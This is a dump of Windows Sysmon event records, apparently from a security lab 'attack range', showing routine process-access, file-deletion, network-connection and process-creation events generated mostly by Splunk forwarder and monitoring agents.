10341000x800000000000000016963Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016962Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016961Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016960Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016959Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016958Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016957Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016956Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016955Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E4C6-63C7-1002-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016954Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C6-63C7-1002-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016953Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.387{E5A8D418-E4C6-63C7-1002-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016968Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:35.995{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA120134B9BC8FED87F75A2564968F0,SHA256=6B2C0262D96888DBF25ADCF34F9EAE547020C6D5876D38B99BBAF4755141C4C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:35.412{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9241C9E22926BAE112F018C591D382A7,SHA256=804CE77FD596F463F2D83973BB72349F6D865FC764548E20CE6EBC548F81CFC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016967Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:35.610{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D970B195A162D9C8B9B8DAC0F344A6EF,SHA256=A037A8DD737FC8A5937544EF08F81BE24EF13141AB621A34EDBBBCFD86DF73F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:36.077{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEFD03792CC1DADC493318C6C778089,SHA256=3ADBBCCBC52C3FFE9C92E8070E19E650A9FF121B921E493135AB6F2DC2428DEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.709{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56377-false10.0.1.12-8000- 354300x800000000000000016970Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:36.056{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50115-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016969Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:37.063{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=018ADEFD21ED44B7FBE5965DC9EDFC7E,SHA256=FB408EEE0859EAA8CFE087902F10F57C3245E56288255F67BF71E64B10E7DF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:37.076{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA30782417A4F8D8844E5D031052FBCA,SHA256=94B1DCA486FA86FAD9B78F26964E4C31C5699148570147D6424D41D542686180,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016971Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:38.138{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471D69D5B3CE61BCFB8B44835649B527,SHA256=4D90D2F1B48D147CF9F280AD79883C6EF4AC782B7E696B7CBF146C84CD09881C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:38.195{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C13CAE8E00815459DBECA9C9BB895C,SHA256=94B11BC495C857B3A47AA08B364A427BBE0D0CC8D886BC313759DBF609154978,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016972Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:39.226{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DEDDE18730559AF9894F2EAA798DB1,SHA256=B383EF191B3069723D62ECCBB2DD2743B51F53C9BD543D15A7E663F4EAE81114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:39.280{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57560F2BCB7B5C6E68713B72DEB55644,SHA256=55B26FB585C0E1B994A7E36F4918B78FAF4D5E56E029B0A2DCBF9ACF964F5465,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016973Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:40.308{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9AE0B646B2DAAC5804A2F721F97377E,SHA256=0F088CF029FA8EE0A1492E1E539F92F2B8E2CFC460FA8CEA52FF0858858602FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:40.411{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD15DE83CCA48CB988D8E048E0E23A55,SHA256=C177C7949123E49FF78BF8A949AE6876818659CA515993E5A44EB3F09B0EDAEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016974Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:41.392{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F786CB249C42C56E608796A7DDBDEEB,SHA256=9AAB5BA564DCA544452012FAF788C4AA12D2F677010AE216BEEC2ABC15F82E81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:41.741{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:41.660{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage.sqlite-journalMD5=EE0668DE81E332EA12A91B40FFA3F9DF,SHA256=A180EBE4C8B4C958508ECF75C3363DBD0F3EB17DFE7DE9195CA02DB507E446DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:41.442{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA033896D5F5C7817C4AACE114C65A6,SHA256=E409FCF9262902B8D0A569C913270EAC51E8E37B1EEB67DD41452A7AD55F8F58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017006Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017005Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017004Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017003Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017002Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.741{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017001Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000017000Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:42.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program 